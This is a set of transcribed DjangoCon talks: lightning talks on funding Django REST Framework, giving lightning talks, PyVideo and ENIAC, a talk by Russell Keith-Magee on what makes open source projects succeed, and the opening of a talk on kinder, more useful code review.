Hopefully you can use me any way that you are wanting to, with comprehensive documents to assist when you have no clue, supported by a friendly group of worldwide Django users who gladly volunteer their time for mentoring and helping you. Whether building up migrations or figuring out a class-based view, or deploying a server on a platform that is very new, I have no doubt that with their help your lovely brand new site will soar. And if you fix enough bugs you may find yourself joining the core. Some people want to dump me and are looking for the next cool thing, yet I am quite excited for the features 1.10 will bring. But still I am quite busy handling emoji and cuneiform because I am the model of a modern Django. So many more, many more, many more, many more! Okay, are you sensing the theme here? Okay, so my name is Tom Christie, I am the author of Django REST Framework. And thank you. I want to spend a few minutes talking about the collaborative funding model that we have recently launched. Before I start, can I ask everybody in the room, if you or the company that you work for uses Django REST Framework in some capacity, can you put your hand up? Oh, wow, okay. And if you or the company that you work for currently funds one of the REST Framework paid plans, can you put your hand up please? Okay. That's what needs to change. So here's the good news. Yeah, a few weeks back I quit my regular employment and started working on REST Framework full time. The result of this so far: there's a huge slew of bugs and tickets that have been closed. We've had the 3.4 release out just last week, complete with schema generation, a Python client library for interacting with your APIs, and a command line tool for interacting with your APIs. And this functionality is also going to start to open up a lot of other interesting possibilities as it matures. And there's an absolutely huge stack of work that is coming next on top of this as well. So there's going to be hypermedia support coming up. I have plans for real time support using WebSockets coming up. More mature authentication defaults in REST Framework to help you build more secure APIs, helping you get into production faster by providing templates that allow you to get your API up and running and in production in next to no time. What else? So client libraries in, hopefully, as we go forward, JavaScript, perhaps Go, Java, Swift. Improved tooling for API documentation, as well as monitoring, debugging, all sorts of things that we can work on. I can see, you know, there's at least two or three person-years' worth of work that I can already see from here. So I can't do this without your help. And I think the core thing that I want to say in this talk is trying to make the business case for funding, whether it's one or, you know, hopefully both of the Django Fellowship and the REST Framework paid plans. And the key here to me is I think that this is something worthwhile because I think it's in your best interests to do so. Like this is the pitch I want to make to businesses, because it's absolutely clear to, you know, it should be clear to everybody that a well-invested open source ecosystem represents a huge competitive advantage to your companies. Okay. And also, although the collaborative funding model is a kind of new business model and slightly atypical, I think it's really compelling because look at it this way around. So myself, Adrienne and Tim, we want to work for your companies full time. And there's one pro and there's one con.
The catch is we're only going to work on these open source projects that you use. Nothing else. The pro is, per company, you only have to pay us a small fraction of a full time salary. Right? That sounds like a good deal to me. So if I'm asking for your money, I think it's very important to be transparent about exactly what I'm asking for. I'm looking for about $65,000 a year in order to make this viable. So that's revenue, not salary. So this isn't some huge money-spinning scheme, but it is enough to support a viable business. Okay? Where we are at the moment, we're starting to get close to the tipping point, right? Getting to the 100% funded level is the thing that will change all of this. And we're starting to get there. So here's the money shot. The plans, the corporate plans, start at $50 a month, okay? And every single one of those makes a significant difference from my side. Every single one. And I want to make it clear, this is an investment, not a donation, okay? So if your company's considering funding, you know, get in touch with me, I will happily help you talk with your business owner about trying to make the case for funding it. Thank you very much for your time. Thank you. My name's Trey. I have a lot of experience with workshops and tutorials and with lightning talks. Until this morning, I had virtually no experience giving a talk longer than five minutes and less than three hours. So I'm going to share with you some tips that I hope will help inspire you to give your first lightning talk. When thinking of a topic, remember that you want to deliver value to your audience. So that can mean reviewing a familiar concept. It can mean teaching folks a new skill. You could shed light on a topic that's a little new or unfamiliar. You could also entertain people with a fun story. You can talk really broadly about a topic or just barely introduce it. You could dive into a topic that's really niche that only a handful of the people in your audience know about. That's okay. When you make a lightning talk, use an outline. Make a bulleted list of points that you'll cover and hone that list down to something that fits in five minutes. The first thing you'll want to do is set expectations. If there's background information necessary, review it or state that it's needed so that people know whether or not they're in your target audience. You only need one takeaway for a five-minute lightning talk. The fewer the takeaways, the better, and don't be afraid to cut things out because you can always elaborate more later. Keep it simple. Limit the number of variables to decrease the likelihood that things could go wrong. For your first lightning talk, use slides. Don't use too many slides, and don't try a live demo. Live demos are really hard to pull off, so don't even try the first time you do a lightning talk. You can always show demos to people after the talk. When showing code blocks, make sure people can read the code on a projector in a well-lit room. Use dark text on a light background. Don't use white text on a black background that looks cool on your computer when you're coding late at night. It's kind of hard to read on a projector based on the way projector technology kind of works. Also make your font size big so that people can read it in the back of the room, and make sure not to put too much stuff on each slide. Write speaker notes. Edit and re-edit those speaker notes, and script your talk as much as you can.
You may or may not have noticed it, but I am entirely reading off of my speaker notes, and that's pretty much what I was doing this morning when I gave my talk as well. There is no shame in scripting your talk. It's nice to have your speaker notes memorized, but it's not essential. Performances are fun, and performances are scripted. Ideally, remove non-essential parts that you notice while rehearsing. In the worst case scenario, if you have like 80% of your talk left and 30 seconds to go, what is that 10-second take-away phrase that you can deliver before you say, thank you very much? When you get towards that five-minute time limit, make sure to panic. Sorry. Don't panic. If you're ending too soon, give people your 10-second pitch and move to questions, or end it right there. After your talk is over, take a deep breath and congratulate yourself. If you are an introvert like I am, you just broke the ice. You gave everyone else something to talk to you about afterwards, a reason to find you somewhere else at the conference and introduce themselves to you. That's it. Cool. So, my talk's up. How do I... there we go. Okay, so how many of you have frequented the site, PyVideo? Can you all hear me? Fantastic. Yeah, great. So if you frequented it in the past six months, you probably saw that it's going down. The people that were running that, Will and Sheila, they're just getting tired. They want to move on. And there was a bunch of people that stepped up to say, hey, let's keep this thing going. It's great. Personally, it's where I learned a lot of awesome things about Python and did studying on my own while I was working out or doing the dishes or whatever chores I had. So I ended up being the only person left after a lot of people said, hey, we can help out. I ended up being the only person left that had built a site in time for PyCon. And now we have, while I was at PyCon, gotten a bunch of people together to continue work on that project. It's not built in Django, sorry, built in Pelican, a static site generator, but it is hosted on GitHub, which makes it super lightweight, super cheap to run. And what I'm here to do is to tell you that, one, it exists. We're always looking for help. We are moving really fast and getting new talks out onto PyTube. SciPy is already up. SciPy ended a few days ago. It's already up for your viewing pleasure. And if you have any questions or want to talk about contributing back, feel free to Twitter me at PaulLogston or just come up to me and talk to me during the conference. Thanks. All right. If I was better prepared and not quite this busy, I would have probably done slides, but we're going to make do with what we can here. So who here has heard of ENIAC? All right, awesome. ENIAC was the first electronic computer in the world. It was made right here on Penn's campus and there are parts of it four blocks away from here. So if you came all this way and you're a geek, don't leave without seeing ENIAC. So here are a couple of things. ENIAC, all the original programmers of ENIAC were women; men considered it beneath them. But not only was the first programming language ever designed by a woman, the original programmers of ENIAC were women. So go to Django Girls, buy a Code Like a Girl t-shirt, and use it in the picture you're going to take with ENIAC. Find a new friend, somebody you don't know, and make the walk. Felicia Day gave a keynote here a couple of years ago.
You may know her from web series like The Guild or TV shows like Supernatural and a bunch of other things that are out there. She was pretty psyched and this got retweeted many times. I am working to try to get in touch with the curator of ENIAC. We've gone back and forth a couple of times to find a time when you could actually open up the entire display so we could do some photo ops like this. So if you want a chance at that, keep an eye on my Twitter. It may be last minute. I'm twitter.com slash flipperPA, flipper like the dolphin, PA like Pennsylvania. Because I'm hoping to put that together to get a couple of people some shots like this, which are really cool. You can actually see the vacuum tubes and everything it took to make four whole K of memory. If you need directions from here to there, it is incredibly complex. You are at 3730 Walnut Street. It is a seven minute walk to 3300 Walnut Street where you see the pin. You can walk down to 33rd Street, turn right, and the first entrance on 33rd Street on your right is the ENIAC display. There is a signpost outside on 33rd Street that says ENIAC. So go see ENIAC if you get a chance. It's absolutely awesome. This is Paul Schaefer, the curator. He is not the guy from David Letterman. Also at 37th and Ludlow, that is if you go down to 37th Street and turn left, there's a walkway in between Chestnut and Market, aka on the way to Han Dynasty, where you can see the monument where in 2015 we inducted the original six women of ENIAC to our technology walk of fame here at Penn, which is a pretty big deal. This is one of my favorite spots on Penn's campus. It was long overdue that we credited these six pioneering programmers with the honors they all deserved. So lightning talks don't have to be five full minutes. Mine is not. Keep that in mind for the next time you give a lightning talk. You can do it in 30 seconds. Now, thank you.
|
Lightning Talks by Many People 00:04 - Adrienne Lowe 06:33 - Russell Keith-Magee 09:42 - Tom Christie 15:14 - Trey Hunner 18:39 - Paul Logston 20:28 - Timothy Allen
|
10.5446/32708 (DOI)
|
Come on, y'all! MUSIC MUSIC MUSIC MUSIC MUSIC MUSIC Well, hello again, Philadelphia. As we just had, my name is Russell Keith-Magee. If you've heard my name before, it's because I'm a member of the Django core team, and I have been for coming up on 11 years now. I've served on the technical review board for the 1.7, 1.8, 1.9 releases. I'm also on the security team. Django is an open-source project, but it's not the only open-source project I'm associated with. These days, I'm mostly spending my time on the BeeWare project. BeeWare is an open-source collection of tools and libraries for creating native user interfaces in Python: desktop, but also for iOS, Android, and single-page web apps. And I've been associated with a bunch of other open-source projects over the years as a user, a contributor, and project maintainer. So, earlier today, I spoke about some of the known and factual aspects of open-source projects that you need to be aware of, things like legal issues and sort of burnout and depression issues. These are well-studied, have well-known causes, well-known resolutions. There's all very, very factual stuff there. This talk, however, isn't about that hard data. This is about how to make your project successful. Now, the thing that I want to flag here up front is the very distinct risk of cargo culting. Cargo cults are a phenomenon that came out of World War II. There were a lot of Pacific islands filled with people who weren't, you know, modern Western civilizations. And their first experience with meeting Western civilizations was that these people would turn up, and these large metal sky birds would come down and deliver large amounts of food and housing materials and all sorts of vehicles and interesting things. And then a couple of years later, they all disappeared again. They started building these giant bamboo structures to try and bring the sky birds back again. They'd flatten out large pieces of land and set burning pyres along the side, because there were always lights at the side where these sky birds would land. So we ended up with entire cultures building landing strips for planes that were never going to come, because they didn't understand why the planes were coming in the first place. Cargo culting in technology can be very, very easy to do. And you say, okay, this project did this, this project is successful, therefore I must do this. The one thing that I will assert, and I hope it's not too controversial, is you can't be an underpants gnome. For those who don't know about underpants gnomes, it's a joke from South Park. The underpants gnomes are these little creatures that sneak into your bedroom at night, and they steal your underpants. Why? Because they've got a business plan. Step one, they steal the underpants. Step three, profit. They can't ever explain what step two is, though. If you're really, really lucky, you might have a massive success just accidentally happen to you. But more realistically, you're going to have to work at it. And that preparation starts with knowing what kind of project you've created and what your commitment to that project is going to be. Now, I would argue there are two main sorts of open source project release. The first is the simple, you might find this useful release. It's where you're not really looking to start some major project. You're not trying to write the next Django. You've just got a thing that you've done, and it's no harm to me if I put it out there, and you may be using it as well. You might find it useful. Who knows?
This is essentially the spirit behind the scientific method generally. In the movie Awakenings, which is based on a book by Oliver Sacks and stars Robin Williams, the main protagonist is a researcher. He's being quizzed about his PhD, which he describes as an epic project: I was to extract one decagram of myelin from four tons of earthworms. I was the only one who believed in it. Everyone else said it couldn't be done. And his inquisitor says, it can't. And the response is, yeah, I know that now. I proved it. So you might not even be talking about a successful project here. It might just be something where you're tinkering to see if something might be viable, or it might be something you've used in production, or you don't have any particular commercial interest in it, but you might as well put it out there so someone else can look at it. You're not trying to start something. You're just trying to help the community by letting the world know that you've done something that might be used as a starting point, or an inspiration, or as proof that it just doesn't work. The other approach is where you're throwing things out there, and you actually want people to use the project. You're planning to continue working on it. You'd like other people to use it too. And in an ideal world, you get contributions from other people that can improve your code base. This is where you think you've got the next Django in your hands, and it doesn't necessarily have to be something the size of Django. It can be a small project, but you're putting your flag in the dirt to say, I'm the go-to library for X. But it's incredibly important to know which type of project you're releasing. And if you're just throwing it out there and you're not making a commitment to maintain it, that's fine. But if you're asking people to intellectually invest in your tool, your framework, your library, then you've also just signed up to pay attention to that community. And to be clear, I'm not saying you're therefore obliged to fix their bugs for free. I'm saying that you're putting something out there and representing it as something that you intend others to use. You've just started a dialogue, and you've started to set expectations. So the key thing here is you need to know what you're trying to do and then communicate what you're trying to do, communicate your intentions. If you find a project, and it says in banner text in the readme, this is an experiment that I've abandoned, then you know what to expect. If it says nothing, the default interpretation is almost always going to be, this person wants me to use their project. So consider yourself as a user. If your project website says, RetroIncabulator is the best framework for prefabulating your differential girdle spring, and you've got a differential girdle spring that needs prefabulating, who doesn't, you're going to be excited. You've just found a project that solves your problem. And when it turns out that it only prefabulates non-reversible differential girdle springs, you're going to log a bug, or try to submit a patch, or try to engage with the project in some way. After all, why would this person have put it out there if they didn't want it to improve? And if the project maintainer then doesn't respond, or responds slowly, responds ambiguously, or worse, responds angrily, you're just going to get annoyed at the project. And the project maintainer has then just lost a potential community member.
Although, as an interesting aside, we would all, as human beings, do a lot better to get in the mental habit of thinking of open-source projects as "you might find this useful" by default, rather than "everybody please use this" by default. Assume by default you're going to get no support, unless the project says you will. Don't assume you're going to get support, and then be surprised when you don't. And don't forget, a project can change over time. A couple of years ago, I was maintaining a library called Cassowary, which is an implementation of a well-known constraint-solving algorithm. I published it because I was, at that time, using it as part of Toga, a widget toolkit. I've recently changed Toga to use a CSS-based approach, so I no longer need the capability that Cassowary implements. But to make sure there's no confusion over the status of the project, the project website now lists it under an attic section of the BeeWare homepage, and at the top of the readme, it says the same. I'll still merge pull requests, and if someone wants to take over the project, they're more than welcome. But I've made it clear that it's not the focus of my attention anymore. So, you know what you're trying to achieve with your project, and you've communicated that effectively. So, what comes next? I would suggest the next thing you need to look at is your project's out-of-box experience. The experience that a new user has when they discover your project for the first time. Imagine someone knows nothing about your project, your code. They visit your website. What do they find? Django's out-of-box experience is a good example here. If you visit Django's website, there's a brief description of what Django is, which invites you to do a tutorial. You follow the steps, and about the only decision you really need to make along the way is what database you have to use, and even then, it strongly says, just use SQLite for your first pass. Your path to getting started is clear. You don't have to make a whole lot of decisions, and you should, at the end of a four-page tutorial, get a running project with a decent feel of what the project can do. If users can't find your tutorial, or they can find it and it doesn't work, they're going to assume either that the problem is them, that they're stupid, or that the problem is your project, and neither result is good for your project. Kathy Sierra is a tech writer and blogger. She wrote a blog post entitled Attenuation and the Suck Threshold, in which she talks about user engagement on new projects. What she says is, when you're introducing a person to a new project, you need to make their time from zero to kick-ass as low as possible. A new user has to go from "I know nothing about this project but the name" to kicking a real-world, practical and personally applicable goal, as quickly as possible. If that time is low, the user gets an immediate sense of progress, and a little endorphin rush in their brain, and they get over that suck threshold; they feel like they can do anything, and they're more likely to persist and go to the next step, even if those next steps are a little bit harder. And every time that they kick a little bit more ass, they get a little bit closer to doing more and more advanced things. If that time is high, the more likely they are to give up, and the more likely they are to develop a negative impression of your tool or product.
Every decision a new user has to make during the tutorial process is one more thing that can make it harder to get over that suck threshold. Every dead end they go to in your documentation tree makes them feel that little bit more stupid. And they're not stupid. You've just failed to communicate effectively with your most important audience, new users. Marketing people like to talk about conversion funnels, and it helps to think about your open source project in a similar sort of way. The journey through an open source project doesn't stop with becoming a user. If you're going to have a vibrant, long-running project, you want people to work their way all the way down the conversion funnel. They come to you as potential users. The entire population of the planet is effectively a potential user. Some of those people will do the tutorial and become new users of your project. Some of those people will continue to use the project, find some real practical use for it and become actual users. Some of those users will hang around and become long-term community members. Some of those community members will eventually become contributors. Some of those contributors will join your core team and eventually some of them will move into leadership positions. Unless you are working on that entire funnel, that entire conversion funnel, your project will at some point stall. That means you also don't just need a first-time user tutorial. You need a first-time contributor tutorial. You need to document your processes, so the potential contributors can move their way down this process, or down this funnel. Django does this fairly well. The contribution process is very well documented. At the sprints, there's always someone who's leading the process to say, hey, let's get involved. It's something that I think I've been able to do quite well with BeeWare so far, with open offers of mentoring and with the Challenge Coins, trying to encourage people to get involved. It's not just about getting users though. You have to be able to retain those users over time. Which means you have to think about what users need in the long term, such as the role that backwards compatibility plays in long-term project viability. Django has a backwards compatibility policy, which guarantees that code running today will continue to run for quite some time in the future. At least two release cycles. And then there's also a long-term support release to go even longer. Other projects deliberately break compatibility between point releases. How much does this matter? It depends entirely upon your perspective and your intended audience. If you spend your life working on short-term contracts, delivering sites with no long-term maintenance overhead, say a promotional website for an event or a site supporting an advertising campaign, you don't have long-term problems. You finish your job, you move on to the next one. Every time you start, you're free to try something new, experiment a little bit, replace something that didn't work well last time. You're looking at the world through glasses which think of six months as a long time. However, if you're engaged in a multi-year project, you really care about long-term maintainability. In a former life, I was involved with the Joint Strike Fighter project. It's a multi-billion-dollar project to develop the next generation fighter for the US Air Force. And at the point of conception of the project in the 1990s, they didn't anticipate delivering a working airframe for 20 years.
And at this point, it's six years late. And before it becomes operational, they were planning on doing two full rebuilds of the avionics subsystems. If you're in this space, you really care about long-term maintenance. You don't want the world shifting underneath you every three months. You can't use a product that doesn't have a 10-year support plan in place. Six months is a rounding error. It's a series of meetings with your supervisor. Another example of this is a quote from Maciej Ceglowski from Pinboard: a rule of thumb that has worked for me is that if I'm excited to play around with something, it probably doesn't belong in production. And I agree with him. Excitement is not a property I aspire to when I think about my production servers. Boring is a virtue in production. Boring is predictable. Boring doesn't wake you up at three o'clock in the morning having trashed half your database. Now, to be clear, I'm not saying one approach is right and one approach is wrong. I'm saying that the properties you value in a project depend on your perspective. And that perspective is something you need to communicate so that users know what to expect. You also can't just focus on your own project and your needs. You need to look at the broader community, the ecosystem in which your tool sits. To explain this, I'd like to take a quick tangent here and talk about tractors. One of the project founders of Django is a man named Jacob Kaplan-Moss, unfortunately not here this week. Jacob is a man of many talents. But until recently, one of his biggest passions was his farm and his tractor, named Tinkerbell. One of the interesting features of farm tractors, not something we usually think of as a bastion of high tech, is something called the three-point linkage. The three-point linkage is a system that has been used on tractors for almost 90 years. It was originally developed in the 1920s by Ferguson and then was adopted by pretty much every farming equipment manufacturer and tractor manufacturer. It was eventually encoded as an ISO standard in the 1980s, but that was really just codifying what everyone already agreed on. What the three-point linkage does is provide a very simple interface that enables plows, seeders, harvesters, whatever else, to be attached to any tractor you want. And, hitting the backwards compatibility point, it's been consistent for 90 years. A farm tool built in the 1930s will connect to a tractor that came off the assembly line last week, and vice versa. What the three-point linkage does is change a tractor from being a single-purpose tool into being part of an ecosystem of tools. When you buy a tool, you get a tool, and you can buy a fine set of tools. But the real power comes when the tools are able to work together. When you buy into an ecosystem, you get infinitely more value, because you're not just buying a tool. You're buying into all the possible ways that tool can be combined with everything else in the ecosystem. No tool lives in a world of its own, especially in computing. So pay attention to the rest of your community and work with that community and their expectations. This is really just Metcalfe's law writ large. Django by itself is not that exciting. It can do stuff, sure, but it's limited. What's exciting is the ecosystem of stuff around it. Every time someone writes a plug-in or a library that's part of the Django ecosystem, every other package gains some value because it's compatible with all the other bits.
There's something like 4,000 packages on PyPI that are tagged as being Django-related or Django-compatible. Now, even if you consider Sturgeon's law, that 90% of everything is crap, that's still 400 useful packages. This is something that Django does quite well at a technical level, but it doesn't do well at a social level. Django's app architecture encourages people to build distributed apps for specific tasks. As a project, though, Django doesn't do a good job at highlighting those apps in the community as a whole and the value that's been added in the community. There are sites like Django Packages, but Django's core infrastructure doesn't ever reference those sorts of tools. That limits the usefulness of Django Packages, because it's not a hub that everyone who comes to the project knows about. If you're paying attention, what you'll notice is a recurring theme here, the importance of communication. It's not just a matter of what you're saying, it's how you say it, how the message gets out there. Django wasn't the only Python web framework that was launched around 10 years ago. About that time, there was also CherryPy, TurboGears, and repoze.bfg. Ten years later, who's heard of those three? We've got maybe a quarter of the audience. Okay, so TurboGears and repoze.bfg kind of merged and reformed and ended up as Pyramid. Why was that rebranding necessary? Well, if TurboGears had been successful, it wouldn't have needed to merge with anything. It would have been the Django of today. So why did Django, for want of a much better word, win? Was it because Django is technically superior? Well, I've had more than one discussion with Pyramid advocates who have told me at great length that Django does it wrong. And let's say they're right. They've certainly got some valid technical arguments in there. If that's the case, how did a technically inferior product win? Django, I would argue, won because the publicly communicated narrative about Django was a lot more coherent. It resonated better with the audience it reached. Django's tutorial and the onboarding experience were a lot better. Django's documentation and community meant the ongoing experience was better. These factors, messaging, onboarding, user experience, these are sales and marketing factors. Django won because of better sales and marketing. I'm not saying we had better banner ads. It won, for want of a better word, because it was better at getting the message out. I've also had this from the other side. Eight years ago, I started a project called Django Evolution. It was a migration framework for Django. And at the very first DjangoCon, nine years ago, I, oh, sorry, eight years ago, I participated in a panel discussion with Simon Willison and Andrew Godwin, as the three maintainers of the three migration frameworks at the time. And I think at the time, the other two actually weren't publicly available. They were like released as a result of being on the panel. South was available. And of course, as we all know, Django Evolution was eventually moved into Django core as part of the 1.7 release. No, wait, hang on. Oh, wait, that was South. So I was first to market. What happened? I got tagged very early on with the label that Evolution was magic. And I never managed to shake that. I never managed to reshape that narrative. I completely failed at sales and marketing, and the rest is history. So don't just write off sales and marketing. Don't get me wrong. Many salespeople and their tactics make my skin crawl.
But that doesn't mean that sales and marketing isn't important. It's just the opposite. It's incredibly important. But it does mean it needs to be done well. And marketing that works well for you may not be the marketing that works for your target audience. And it's not just about open source either. The same is true for any commercial endeavor. Buy me a whiskey and ask me how I know. Okay, so what works and what doesn't? What I'm going to do now is what is scientifically termed a wild-ass guess. I don't have any hard data to back this up. This is entirely anecdotal. I have no reason to believe that I'm right. I've been involved with successful projects. That doesn't mean the projects that I'm involved in are successful because of these things. I just think these are probably the causes. And there are almost certainly factors that I've missed. Okay, so why was Django successful? Well, it was in the right place at the right time. We were in a world where we'd been living with great big Java web frameworks, and Django came in and was able to show you how you could build a blog in 10 minutes. It was a breath of fresh air with a new dynamic language, when the existing set of tools that were available were very, very heavyweight. It had extremely good documentation from day one. Day one, you landed on the project page and there were pages and pages of documentation and a fantastic tutorial that walked you through. My first experience of contributing to Django was basically coming in, finding the project, and discovering that it couldn't do one little odd thing. And then, because the documentation was so good about explaining what it should have done, combined with the fact that Python is a really easy language to read and work out what's going on, I contributed a major patch, and basically within a month I was a member of the core team. Now, okay, this was like 11 years ago, so there was a lot more momentum. But the fact that that was able to happen, the fact that that path, that onboarding path, was so easy, is part of the reason why Django was successful. It also got set up very, very early as a very nice community. I don't know if this was an explicit decision, but Jacob and Adrian were very, very aggressive about clamping down on anybody who was rude on mailing lists. And as a result, the mailing lists, generally speaking, stayed very, very polite. It made it a very welcoming community and a great place to hang around. Django Evolution was the exact opposite. It was in the right place, it was at the right time, but it communicated the message badly. Cricket is another project I've been involved with. It's a graphical test runner. It was a very controversial idea, and I didn't really manage to convince people of the idea. It had some odd graphical choices; it was using Tcl/Tk. And then I didn't follow up: once I found the limitations of Tcl/Tk that I was starting to run up against, I kind of haven't gone back and really refreshed that project. BeeWare, on the other hand, is one that I'm particularly proud of. I founded the project, and so it's really been the focus of all the things that I've observed over the years. So, in my opinion, it's a combination of everything that I currently see to be how you are successful as an open source project. First off, it's an umbrella project. BeeWare is one name wrapping around a whole lot of smaller projects.
That means I'm not trying to build a brand around each one of my little libraries. I'm building one big brand, BeeWare, and then directing people, funnelling people, to all the individual parts. That has the additional benefit that it's a lot easier to understand the whole picture, because you can understand what this does and what this does and what this does, and then you can see the path of how they're connected, rather than trying to understand the entire blob at once. I've been very, very careful to be aggressively nice. This is something that I've kind of learnt from the Olas of Django Girls. They are, in their public emails, public communications, absurdly friendly and nice and gregarious and bubbly. Initially, that felt a little odd, but when you do that, it actually, one, makes you feel really kind of good, because you're not focusing on the negative, you're focusing on the positive all the time. People like to feel positive. Who would have thought? I've been very aggressive about outreach. Going aggressively after new maintainers and saying, you want to contribute to BeeWare? I am there. I will help you become a BeeWare contributor. I will be your mentor. I will help you get over that line. I will help you get your commit bit. So, focusing on that onboarding process. What does it look like to become a new user? What does it look like to become a new contributor? And rewarding those contributors with things like Challenge Coins; every time something happens that is a notable event, a new person joins the project, a new person does something that's complex, tweeting about it, making a bit of noise on social media, and acknowledging all contributions, not just code: things that have been done socially, people who have written documentation, people who have contributed to the broader ecosystem, people who have contributed to other projects that have helped BeeWare. I've been very vocal on social media. Getting out there regularly, maintaining a cadence of saying things about your project, getting people saying, hey, look, this thing is out there. This project exists. Just knowing that it exists is part of the whole exercise with sales and marketing, because you've got to be in the front of people's minds all the time. I've also had a very balanced attitude to accepting patches. In the days of Django, particularly my own early days of Django, if a patch wasn't perfect, I wouldn't merge it. I'd probably go and take that patch and fix it up myself. In BeeWare, I've kind of relaxed that a bit. I've fallen back onto the world where the test suite tells you whether it works. You look at the code: is the code better for being in rather than out? Does one more test pass? Does one more edge condition get handled? You can always clean up the architectural stuff later. That means that you get more people in, and you don't get people tied up in really, really convoluted, you know, project acceptance procedures. On top of that, we've also automated a lot of these project acceptance procedures, automating continuous integration tests, automating linting checks. I've also been very careful to set community expectations around community culture, and that money is a part of this story. We are not expecting this to be everybody volunteering. We want money to be part of this. We want a healthy lifestyle, a healthy mental attitude to the project, to be part of the project.
So that later on down the line, when we do get to the point where maybe there are commercial organizations involved, we're not torn by this internal schism of, oh no, it must be free, oh no, it must be paid. We're setting it right now: it's going to be paid, because that's the way you make things sustainable. All of this really comes down to the old quote from Pasteur, fortune favours the prepared mind. If you want your project to be successful, you need to plan for that success. It takes years to become an overnight success. I've benefited from being part of a large and successful project like Django. I'm in the very early stages of what I hope will be a similar journey with BeeWare. The things I've spoken about today, both in this talk and the one I gave this morning, represent the sum total of the knowledge I have about being successful. You'll notice, though, how little of it has to do with the technical aspects of the code. Open source projects are ultimately about communities. Communities of people with aligned interests acting collectively. This means that issues of communication, collaboration, social justice, inclusivity, these are intertwined with technical aspects, because without the soft aspects, the hard aspects can't be done. This is something that's taken us collectively as an engineering group a long time to learn. And it's something where it's taken a long time to establish best practice. And we've still got plenty to learn. The key is to pay attention to it. Keep your ears open and your mouth shut, and look for ways to improve the social aspects around your project and improve your communication. Thank you all very much. Thank you. Thank you. Thank you. We have the room for three more minutes, so you can either ask the world's shortest question or you can take your questions outside afterward. I'll also say, the challenge coins: anybody, I'm here till the end of the week to sprint. So if anybody does want to become a core contributor, I can guarantee you will have one of these by the end of a two-day sprint. Probably even sooner than that; we gave out 48 of them at PyCon US. I'm also actively looking for benefactors and sponsors to help me continue to build BeeWare. So if you or your company might be interested in pitching in or hiring me, come talk to me. Yeah, I'm also going to be doing Tim Tam Slams up in the mezzanine in a bit. What's a Tim Tam Slam? Come and ask me and I'll tell you. What's a challenge coin? A challenge coin is one of these. It's a coin that you get if you complete a challenge. If you go to pybee.org, there is a list under the contribution section that says challenge coins and gives the full story. Awesome, thank you so much. Thank you.
|
So you've written a bunch of code, and you think others might find it useful. You open source it, and... profit, right? Well, no. PyPI is filled with thousands of projects that have been released with the best of intentions, but never really break into the mainstream. How do you escape this trap, and maximize the chance that your project will actually be used, grow and thrive?
|
10.5446/32709 (DOI)
|
Come on, y'all! Hi everyone, I'm really excited to be here. This is my first time at DjangoCon and my first time in Philadelphia. So, a little bit more about me. I work in Frankugur, Canada. I work with Django, and I also volunteer as an instructor teaching people to code. It's a non-profit; we run separate workshops for women and for kids to learn to code. So today I'm talking about code reviews and ways to make them better. Let's think a little about what code review usually looks like. In the simplest case, someone opens a change for review and people look at it and write comments. For me, code review, especially early on when my own code was being reviewed, felt really intimidating. It felt like everyone was picking apart my code, every single line. People would tell me what I had done wrong, that something wasn't best practice, and I didn't always know what the best practice was. They would tell me to restructure things I had hoped were already fine. After a while, it felt like nothing I submitted was right. Everything had to be given back for changes. I felt like I was wrong all the time. I was making so many mistakes. Maybe I wasn't good enough. Maybe I didn't belong here at all. Before my code could go in, I had to address the comments, so I addressed them in the most literal way possible: the comments on my JavaScript file, I just made exactly the changes that were asked for. I knew I had got things wrong; I apologized for the decisions I had made, but that didn't make the review experience any better. Addressing comment after comment, making change after change, takes its toll. I'm not sure this is the right word for it, but reviews like that made people feel like they were being judged. Nobody wants to go back to that. We also had teammates who simply avoided reviewing; they preferred to keep writing code. Reviews sat waiting, and waiting. I won't pretend we always hit the turnaround times we wanted. Reviews were skipped, not everyone kept up with them, and code review quietly became the thing in question. We started to ask ourselves: what is this? What are we actually doing here? We knew code review as a good practice, but it had also become a bottleneck in our process. Maybe we didn't need it. Maybe we could just rely on tests instead. Our developers know how to write tests; maybe they would write tests every time and we wouldn't need review. Maybe. I don't know. We could debate whether review is something we should do or not, but I think it's really important to know why we do code review in the first place. Code review is not only about catching bugs, and it's definitely not a place to control people. It's not a place to prove who is a good programmer and who isn't. You might come to the conclusion that a change doesn't make sense for the codebase, so you discuss it, you rework it, you look for a better approach. It's not a place for the kind of negativity that can creep into reviews. Maybe we can build a better practice, because what we keep talking about is quality. Which brings us to the question: what is quality code?
I know some people will answer that quality code is code that follows the style rules. But there is a lot more to quality than just style. Correctness matters; do you really want to check every style rule by hand? Good tests matter: are there unit tests? Is there enough coverage? Documentation is also important; you want it to be readable. Is the code maintainable? There are a lot of things that go into good code, and it doesn't come down only to PEP 8. The point is that we don't want to introduce bugs, and we want to make sure the code stays easy to maintain. That's why we want an extra set of eyes on a change before it goes in. We all miss things. And when you see something that could be done differently, something that could be improved, say so. Talk about the things that make the code stronger and help it stay maintainable. Does it work? So we start by asking how the code can be made as maintainable as possible. You might even want to offer to pair program with the author if the change is complicated. Maybe they are new to this area and don't know it well yet; help them get unstuck. Maybe you went to PyCon, you went to DjangoCon, and you learned about a lot of new things, and your coworkers didn't. You should share what you know so they can learn too, and so the next piece of code is better. A primary purpose of doing code review is for both parties to learn and to understand the code. I think some of us may have forgotten this part; I know I had. In the beginning I thought I wasn't qualified to review code at all. I didn't know what to say. But the truth is that by reviewing changes, asking questions, and reading a lot of code, I learned a great deal. I became a better programmer through code review. If anything is confusing, code review is the time to dig in and ask questions, while the programmer still remembers the change well enough to answer them. Don't wait six months to ask, what does this code even do? You always want to make sure there is someone else on the team who knows about the code. Code review is important. It matters. We care about quality, we care about sharing knowledge, and you want to give people the chance to gain more experience, so it's worth having a review step in your process, because the learning is so valuable. I hope we can stop treating review as a judgment. It isn't only about pointing out mistakes; it's much more than that. The process is really about collaborating with your teammates, not about criticizing them. So, we know we need this. We know we want this step because we want to learn. We also know it can turn negative. How do we make it positive? How do we make it even better? We start by having empathy. Some of us take feedback in stride: we did something wrong, we fix it, we move on. But not everyone finds it easy to have their work picked apart every single day. Write comments with empathy; your comments will be read by everyone. Before you start commenting, read through the whole change and understand the context: what is it trying to do?
